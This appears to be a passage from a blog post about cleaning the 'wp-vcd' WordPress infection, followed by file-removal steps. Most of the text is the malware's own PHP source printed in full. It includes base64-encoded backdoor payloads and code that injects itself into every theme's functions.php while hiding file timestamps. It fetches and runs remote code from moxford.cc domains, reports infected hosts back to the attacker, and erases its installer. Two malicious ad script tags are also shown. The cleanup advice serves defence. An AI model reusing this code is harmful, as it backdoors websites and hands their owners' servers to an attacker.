AgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygkdGhlbWVzIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICRfIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICRfMiAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAnZnVuY3Rpb25zLnBocCcpKQ0KCQkJCQkJCQkgICAgICAgICAgICAgICAgICAgICAgew0KCQkJCQkJCQkJJHRpbWUgPSBmaWxlY3RpbWUoJHRoZW1lcyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXyAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAkXzIgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJ2Z1bmN0aW9ucy5waHAnKTsNCgkJCQkJCQkJCQkNCgkJCQkJCQkJCWlmICgkY29udGVudCA9IGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGVtZXMgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8gLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8yIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICdmdW5jdGlvbnMucGhwJykpDQoJCQkJCQkJCQkJew0KCQkJCQkJCQkJCQlpZiAoc3RycG9zKCRjb250ZW50LCAnV1BfVl9DRCcpID09PSBmYWxzZSkNCgkJCQkJCQkJCQkJCXsNCgkJCQkJCQkJCQkJCQkkY29udGVudCA9ICRpbnN0YWxsX2NvZGUgLiAkY29udGVudCA7DQoJCQkJCQkJCQkJCQkJQGZpbGVfcHV0X2NvbnRlbnRzKCR0aGVtZXMgLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8gLiBESVJFQ1RPUllfU0VQQVJBVE9SIC4gJF8yIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICdmdW5jdGlvbnMucGhwJywgJGNvbnRlbnQpOw0KCQkJCQkJCQkJCQkJCXRvdWNoKCAkdGhlbWVzIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICRfIC4gRElSRUNUT1JZX1NFUEFSQVRPUiAuICRfMiAuIERJUkVDVE9SWV9TRVBBUkFUT1IgLiAnZnVuY3Rpb25zLnBocCcgLCAkdGltZSApOw0KCQkJCQkJCQkJCQkJCSRwaW5nMiA9IHRydWU7DQoJCQkJCQkJCQkJCQl9DQoJCQkJCQkJCQkJCWVsc2UNCgkJCQkJCQkJCQkJCXsNCgkJCQkJCQkJCQkJCQkvLyRwaW5nID0gZmFsc2U7DQoJCQkJCQkJCQkJCQl9DQoJCQkJCQkJCQkJfQ0KCQkJCQkJCQkJCQ0KCQkJCQkJCQl9DQoNCg0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQ0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9DQoJCQkJCQkJCQ0KCQkJCQkJCQkNCgkJCQkJCQkJDQoJCQkJCQkJCQ0KCQkJCQkJCQkNCgkJCQkJCQkJDQoJCQkJCQl9DQoJCQkJCQkNCgkJCQkJaWYgKCRwaW5nKSB7DQoJCQkJCQkkY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3d3dy5tb3hmb3JkLmNjL28ucGhwP2hvc3Q9JyAuICRfU0VSVkVSWyJIVFRQX0hPU1QiXSAuICcmcGFzc3dvcmQ9JyAuICRpbnN0YWxsX2hhc2gpOw0KCQkJCQkJLy9AZmlsZV9wdXRfY29udGVudHMoQUJTUEFUSCAuICcvd3AtaW5jbHVkZXMvY2xhc3Mud3AucGhwJywgZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly93d3cubW94Zm9yZC5jYy9hZG1pbi50eHQnKSk7DQoJCQkJCX0NCgkJCQkJDQoJCQkJCQkJCQkJCQkJCQlpZiAoJHBpbmcyKSB7DQoJCQkJCQkkY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3d3dy5tb3hmb3JkLmNjL28ucGhwP2hvc3Q9JyAuICRfU0VSVkVSWyJIVFRQX0hPU1QiXSAuICcmcGFzc3dvcmQ9JyAuICRpbnN0YWxsX2hhc2gpOw0KCQkJCQkJLy9AZmlsZV9wdXRfY29udGVudHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy9jbGFzcy53cC5waHAnLCBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL3d3dy5tb3hmb3JkLmNjL2FkbWluLnR4dCcpKTsNCi8vZWNobyBBQlNQQVRIIC4gJ3dwLWluY2x1ZGVzL2NsYXNzLndwLnBocCc7DQoJCQkJCX0NCgkJCQkJDQoJCQkJCQ0KCQkJCQkNCgkJCQl9DQoJCQ0KDQoNCg0KDQo/Pjw/cGhwIGVycm9yX3JlcG9ydGluZygwKTs/Pg==’;

$GLOBALS[‘stopkey’] = Array(‘upload’, ‘uploads’, ‘img’, ‘administrator’, ‘admin’, ‘bin’, ‘cache’, ‘cli’, ‘components’, ‘includes’, ‘language’, ‘layouts’, ‘libraries’, ‘logs’, ‘media’, ‘modules’, ‘plugins’, ‘tmp’, ‘upgrade’, ‘engine’, ‘templates’, ‘template’, ‘images’, ‘css’, ‘js’, ‘image’, ‘file’, ‘files’, ‘wp-admin’, ‘wp-content’, ‘wp-includes’);

$GLOBALS[‘DIR_ARRAY’] = Array();
$dirs = Array();

$search = Array(
Array(‘file’ => ‘wp-config.php’, ‘cms’ => ‘wp’, ‘_key’ => ‘$table_prefix’),
);

function getDirList($path)
{
if ($dir = @opendir($path))
{
$result = Array();

while (($filename = @readdir($dir)) !== false)
{
if ($filename != ‘.’ && $filename != ‘..’ && is_dir($path . ‘/’ . $filename))
$result[] = $path . ‘/’ . $filename;
}

return $result;
}

return false;
}

function WP_URL_CD($path)
{
if ( ($file = file_get_contents($path . ‘/wat-is-dat/post.php’)) && (file_put_contents($path . ‘/wat-is-dat/wp-vcd.php’, base64_decode($GLOBALS[‘WP_CD_CODE’]))) )
{
if (strpos($file, ‘wp-vcd’) === false) {
$file = ‘<?php if (file_exists(dirname(__FILE__) . \’/wp-vcd.php\’)) include_once(dirname(__FILE__) . \’/wp-vcd.php\’); ?>’ . $file;
file_put_contents($path . ‘/wat-is-dat/post.php’, $file);
//@file_put_contents($path . ‘/wat-is-dat/class.wp.php’, file_get_contents(‘http://www.moxford.cc/admin.txt’));
}
}
}

function SearchFile($search, $path)
{
if ($dir = @opendir($path))
{
$i = 0;
while (($filename = @readdir($dir)) !== false)
{
if ($i > MAX_ITERATION) break;
$i++;
if ($filename != ‘.’ && $filename != ‘..’)
{
if (is_dir($path . ‘/’ . $filename) && !in_array($filename, $GLOBALS[‘stopkey’]))
{
SearchFile($search, $path . ‘/’ . $filename);
}
else
{
foreach ($search as $_)
{
if (strtolower($filename) == strtolower($_[‘file’]))
{
$GLOBALS[‘DIR_ARRAY’][$path . ‘/’ . $filename] = Array($_[‘cms’], $path . ‘/’ . $filename);
}
}
}
}
}
}
}

if (is_admin() && (($pagenow == ‘themes.php’) || ($_GET[‘action’] == ‘activate’) || (isset($_GET[‘plugin’]))) ) {

if (isset($_GET[‘plugin’]))
{
global $wpdb ;
}

$install_code = ‘PD9waHANCmlmIChpc3NldCgkX1JFUVVFU1RbJ2FjdGlvbiddKSAmJiBpc3NldCgkX1JFUVVFU1RbJ3Bhc3N3b3JkJ10pICYmICgkX1JFUVVFU1RbJ3Bhc3N3b3JkJ10gPT0gJ3skUEFTU1dPUkR9JykpDQoJew0KJGRpdl9jb2RlX25hbWU9IndwX3ZjZCI7DQoJCXN3aXRjaCAoJF9SRVFVRVNUWydhY3Rpb24nXSkNCgkJCXsNCg0KCQkJCQ0KDQoNCg0KDQoJCQkJY2FzZSAnY2hhbmdlX2RvbWFpbic7DQoJCQkJCWlmIChpc3NldCgkX1JFUVVFU1RbJ25ld2RvbWFpbiddKSkNCgkJCQkJCXsNCgkJCQkJCQkNCgkJCQkJCQlpZiAoIWVtcHR5KCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10pKQ0KCQkJCQkJCQl7DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoJGZpbGUgPSBAZmlsZV9nZXRfY29udGVudHMoX19GSUxFX18pKQ0KCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZihwcmVnX21hdGNoX2FsbCgnL1wkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50c1woImh0dHA6XC9cLyguKilcL2NvZGVcLnBocC9pJywkZmlsZSwkbWF0Y2hvbGRkb21haW4pKQ0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsNCg0KCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGZpbGUgPSBwcmVnX3JlcGxhY2UoJy8nLiRtYXRjaG9sZGRvbWFpblsxXVswXS4nL2knLCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10sICRmaWxlKTsNCgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhfX0ZJTEVfXywgJGZpbGUpOw0KCQkJCQkJCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJpbnQgInRydWUiOw0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0NCg0KDQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQ0KCQkJCQkJCQl9DQoJCQkJCQl9DQoJCQkJYnJlYWs7DQoNCgkJCQkJCQkJY2FzZSAnY2hhbmdlX2NvZGUnOw0KCQkJCQlpZiAoaXNzZXQoJF9SRVFVRVNUWyduZXdjb2RlJ10pKQ0KCQkJCQkJew0KCQkJCQkJCQ0KCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWyduZXdjb2RlJ10pKQ0KCQkJCQkJCQl7DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZiAoJGZpbGUgPSBAZmlsZV9nZXRfY29udGVudHMoX19GSUxFX18pKQ0KCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpZihwcmVnX21hdGNoX2FsbCgnL1wvXC9cJHN0YXJ0X3dwX3RoZW1lX3RtcChbXHNcU10qKVwvXC9cJGVuZF93cF90aGVtZV90bXAvaScsJGZpbGUsJG1hdGNob2xkY29kZSkpDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgew0KDQoJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZmlsZSA9IHN0cl9yZXBsYWNlKCRtYXRjaG9sZGNvZGVbMV1bMF0sIHN0cmlwc2xhc2hlcygkX1JFUVVFU1RbJ25ld2NvZGUnXSksICRmaWxlKTsNCgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhfX0ZJTEVfXywgJGZpbGUpOw0KCQkJCQkJCQkJICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJpbnQgInRydWUiOw0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0NCg0KDQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgfQ0KCQkJCQkJCQl9DQoJCQkJCQl9DQoJCQkJYnJlYWs7DQoJCQkJDQoJCQkJZGVmYXVsdDogcHJpbnQgIkVSUk9SX1dQX0FDVElPTiBXUF9WX0NEIFdQX0NEIjsNCgkJCX0NCgkJCQ0KCQlkaWUoIiIpOw0KCX0NCg0KDQoNCg0KDQoNCg0KDQokZGl2X2NvZGVfbmFtZSA9ICJ3cF92Y2QiOw0KJGZ1bmNmaWxlICAgICAgPSBfX0ZJTEVfXzsNCmlmKCFmdW5jdGlvbl9leGlzdHMoJ3RoZW1lX3RlbXBfc2V0dXAnKSkgew0KICAgICRwYXRoID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJF9TRVJWRVJbUkVRVUVTVF9VUkldOw0KICAgIGlmIChzdHJpcG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAnd3AtY3Jvbi5waHAnKSA9PSBmYWxzZSAmJiBzdHJpcG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAneG1scnBjLnBocCcpID09IGZhbHNlKSB7DQogICAgICAgIA0KICAgICAgICBmdW5jdGlvbiBmaWxlX2dldF9jb250ZW50c190Y3VybCgkdXJsKQ0KICAgICAgICB7DQogICAgICAgICAgICAkY2ggPSBjdXJsX2luaXQoKTsNCiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9BVVRPUkVGRVJFUiwgVFJVRSk7DQogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfSEVBREVSLCAwKTsNCiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7DQogICAgICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsNCiAgICAgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgVFJVRSk7DQogICAgICAgICAgICAkZGF0YSA9IGN1cmxfZXhlYygkY2gpOw0KICAgICAgICAgICAgY3VybF9jbG9zZSgkY2gpOw0KICAgICAgICAgICAgcmV0dXJuICRkYXRhOw0KICAgICAgICB9DQogICAgICAgIA0KICAgICAgICBmdW5jdGlvbiB0aGVtZV90ZW1wX3NldHVwKCRwaHBDb2RlKQ0KICAgICAgICB7DQogICAgICAgICAgICAkdG1wZm5hbWUgPSB0ZW1wbmFtKHN5c19nZXRfdGVtcF9kaXIoKSwgInRoZW1lX3RlbXBfc2V0dXAiKTsNCiAgICAgICAgICAgICRoYW5kbGUgICA9IGZvcGVuKCR0bXBmbmFtZSwgIncrIik7DQogICAgICAgICAgIGlmKCBmd3JpdGUoJGhhbmRsZSwgIjw/cGhwXG4iIC4gJHBocENvZGUpKQ0KCQkgICB7DQoJCSAgIH0NCgkJCWVsc2UNCgkJCXsNCgkJCSR0bXBmbmFtZSA9IHRlbXBuYW0oJy4vJywgInRoZW1lX3RlbXBfc2V0dXAiKTsNCiAgICAgICAgICAgICRoYW5kbGUgICA9IGZvcGVuKCR0bXBmbmFtZSwgIncrIik7DQoJCQlmd3JpdGUoJGhhbmRsZSwgIjw/cGhwXG4iIC4gJHBocENvZGUpOw0KCQkJfQ0KCQkJZmNsb3NlKCRoYW5kbGUpOw0KICAgICAgICAgICAgaW5jbHVkZSAkdG1wZm5hbWU7DQogICAgICAgICAgICB1bmxpbmsoJHRtcGZuYW1lKTsNCiAgICAgICAgICAgIHJldHVybiBnZXRfZGVmaW5lZF92YXJzKCk7DQogICAgICAgIH0NCiAgICAgICAgDQoNCiR3cF9hdXRoX2tleT0nOTQwMjg5MWJhODgzM2NkNWUyMTA2OWJkOTVmYzNhMjAnOw0KICAgICAgICBpZiAoKCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vd3d3Lm1veGZvcmQuY2MvY29kZS5waHAiKSBPUiAkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50c190Y3VybCgiaHR0cDovL3d3dy5tb3hmb3JkLmNjL2NvZGUucGhwIikpIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgew0KDQogICAgICAgICAgICBpZiAoc3RyaXBvcygkdG1wY29udGVudCwgJHdwX2F1dGhfa2V5KSAhPT0gZmFsc2UpIHsNCiAgICAgICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsNCiAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoQUJTUEFUSCAuICd3cC1pbmNsdWRlcy93cC10bXAucGhwJykpIHsNCiAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKGdldF90ZW1wbGF0ZV9kaXJlY3RvcnkoKSAuICcvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsNCiAgICAgICAgICAgICAgICAgICAgaWYgKCFmaWxlX2V4aXN0cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnKSkgew0KICAgICAgICAgICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKCd3cC10bXAucGhwJywgJHRtcGNvbnRlbnQpOw0KICAgICAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfQ0KICAgICAgICB9DQogICAgICAgIA0KICAgICAgICANCiAgICAgICAgZWxzZWlmICgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygiaHR0cDovL3d3dy5tb3hmb3JkLm1lL2NvZGUucGhwIikgIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSApIHsNCg0KaWYgKHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7DQogICAgICAgICAgICAgICAgZXh0cmFjdCh0aGVtZV90ZW1wX3NldHVwKCR0bXBjb250ZW50KSk7DQogICAgICAgICAgICAgICAgQGZpbGVfcHV0X2NvbnRlbnRzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICBpZiAoIWZpbGVfZXhpc3RzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcpKSB7DQogICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cyhnZXRfdGVtcGxhdGVfZGlyZWN0b3J5KCkgLiAnL3dwLXRtcC5waHAnLCAkdG1wY29udGVudCk7DQogICAgICAgICAgICAgICAgICAgIGlmICghZmlsZV9leGlzdHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJykpIHsNCiAgICAgICAgICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cygnd3AtdG1wLnBocCcsICR0bXBjb250ZW50KTsNCiAgICAgICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIH0NCiAgICAgICAgfSBlbHNlaWYgKCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKEFCU1BBVEggLiAnd3AtaW5jbHVkZXMvd3AtdG1wLnBocCcpIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgew0KICAgICAgICAgICAgZXh0cmFjdCh0aGVtZV90ZW1wX3NldHVwKCR0bXBjb250ZW50KSk7DQogICAgICAgICAgIA0KICAgICAgICB9IGVsc2VpZiAoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoZ2V0X3RlbXBsYXRlX2RpcmVjdG9yeSgpIC4gJy93cC10bXAucGhwJykgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7DQogICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsgDQoNCiAgICAgICAgfSBlbHNlaWYgKCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCd3cC10bXAucGhwJykgQU5EIHN0cmlwb3MoJHRtcGNvbnRlbnQsICR3cF9hdXRoX2tleSkgIT09IGZhbHNlKSB7DQogICAgICAgICAgICBleHRyYWN0KHRoZW1lX3RlbXBfc2V0dXAoJHRtcGNvbnRlbnQpKTsgDQoNCiAgICAgICAgfSBlbHNlaWYgKCgkdG1wY29udGVudCA9IEBmaWxlX2dldF9jb250ZW50cygiaHR0cDovL3d3dy5tb3hmb3JkLnh5ei9jb2RlLnBocCIpIE9SICR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzX3RjdXJsKCJodHRwOi8vd3d3Lm1veGZvcmQueHl6L2NvZGUucGhwIikpIEFORCBzdHJpcG9zKCR0bXBjb250ZW50LCAkd3BfYXV0aF9rZXkpICE9PSBmYWxzZSkgew0KICAgICAgICAgICAgZXh0cmFjdCh0aGVtZV90ZW1wX3NldHVwKCR0bXBjb250ZW50KSk7IA0KDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIA0KICAgICAgICANCiAgICAgICAgDQogICAgICAgIA0KICAgIH0NCn0NCg0KLy8kc3RhcnRfd3BfdGhlbWVfdG1wDQoNCg0KDQovL3dwX3RtcA0KDQoNCi8vJGVuZF93cF90aGVtZV90bXANCj8+’;

$install_hash = md5($_SERVER[‘HTTP_HOST’] . AUTH_SALT);
$install_code = str_replace(‘{$PASSWORD}’ , $install_hash, base64_decode( $install_code ));

$themes = ABSPATH . DIRECTORY_SEPARATOR . ‘wp-content’ . DIRECTORY_SEPARATOR . ‘themes’;

$ping = true;
$ping2 = false;
if ($list = scandir( $themes ))
{
foreach ($list as $_)
{

if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . ‘functions.php’))
{
$time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . ‘functions.php’);

if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . ‘functions.php’))
{
if (strpos($content, ‘WP_V_CD’) === false)
{
$content = $install_code . $content ;
@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . ‘functions.php’, $content);
touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . ‘functions.php’ , $time );
}
else
{
$ping = false;
}
}

}

else
{

$list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_);
foreach ($list2 as $_2)
{

if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . ‘functions.php’))
{
$time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . ‘functions.php’);

if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . ‘functions.php’))
{
if (strpos($content, ‘WP_V_CD’) === false)
{
$content = $install_code . $content ;
@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . ‘functions.php’, $content);
touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . ‘functions.php’ , $time );
$ping2 = true;
}
else
{
//$ping2 = true;
}
}

}

}

}

}

if ($ping) {
$content = @file_get_contents(‘http://www.moxford.cc/o.php?host=’ . $_SERVER[“HTTP_HOST”] . ‘&password=’ . $install_hash);
//@file_put_contents(ABSPATH . ‘wp-includes/class.wp.php’, file_get_contents(‘http://www.moxford.cc/admin.txt’));
//echo ABSPATH . ‘wp-includes/class.wp.php’;
}

if ($ping2) {
$content = @file_get_contents(‘http://www.moxford.cc/o.php?host=’ . $_SERVER[“HTTP_HOST”] . ‘&password=’ . $install_hash);
//@file_put_contents(ABSPATH . ‘wp-includes/class.wp.php’, file_get_contents(‘http://www.moxford.cc/admin.txt’));
//echo ABSPATH . ‘wp-includes/class.wp.php’;
}

}

for ($i = 0; $i<MAX_LEVEL; $i++)
{
$dirs[realpath(P . str_repeat(‘/../’, $i + 1))] = realpath(P . str_repeat(‘/../’, $i + 1));
}

foreach ($dirs as $dir)
{
foreach (@getDirList($dir) as $__)
{
@SearchFile($search, $__);
}
}

foreach ($GLOBALS[‘DIR_ARRAY’] as $e)
{
//print_r($e);

if ($file = file_get_contents($e[1]))
{
WP_URL_CD(dirname($e[1]));

if (preg_match(‘|\’AUTH_SALT\’\s*\,\s*\'(.*?)\’|s’, $file, $salt))
{
if ($salt[1] != AUTH_SALT)
{
// WP_URL_CD(dirname($e[1]));
//echo dirname($e[1]);
}
}
}
}

if ($file = @file_get_contents(__FILE__))
{
$file = preg_replace(‘!//install_code.*//install_code_end!s’, ”, $file);
$file = preg_replace(‘!<\?php\s*\?>!s’, ”, $file);
@file_put_contents(__FILE__, $file);
}

}

//install_code_end

?><?php error_reporting(0);?>

The culprit links detected by Google Adwords review:

<script async=”async” type=”text/javascript” src=”//go.mobisla.com/notice.php?p=628268&interactive=1&pushup=1″></script>
<script type=”text/javascript” src=”//go.pub2srv.com/apu.php?zoneid=1063894″></script>

This is how we did it:

First of all, don’t panic – the problem is not as bad as it seems, and cleaning this kind of hack is fairly simple if you follow the below steps:

Step 1: Preparing the files

Use File Zilla(Open Source) and download your theme directory folder and plugin folder from the server to a folder on your pc.

Step 2: Search WordPress hack infection

  • Open the folder and search for: class.theme-modules.php
  • Then search for: class.plugin-modules.php
  • Delete these files immediately – this is the source file of the nasty script.
  • Then search for: /wp-vcd

Step 3:  Eliminating the code to stop it from recurring:

Please download post.php file as well. Path: /wp-includes/post.php (On rare occasions this file can get infected)

Search the folder for: /wp-vcd

This will reveal the infected files in search.

Check these files in your root folder:
/wp-includes/post.php
/wp-includes/class.wp.php (delete this file)
/wp-includes/wp-vcd.php (delete this file)
at the top of your post.php and functions.php files you may see this code below (remove it)

<?php if (file_exists(dirname(__FILE__) . ‘/wp-vcd.php’)) include_once(dirname(__FILE__) . ‘/wp-vcd.php’); ?>

This should do the trick. Be careful where you download themes and plugins from. And remember to update ftp, WordPress access as well as database passwords every month. Web Safety First.

Need help? Contact us. We can have your website cleaned in 24 hours.

2018-05-10T10:25:21+00:00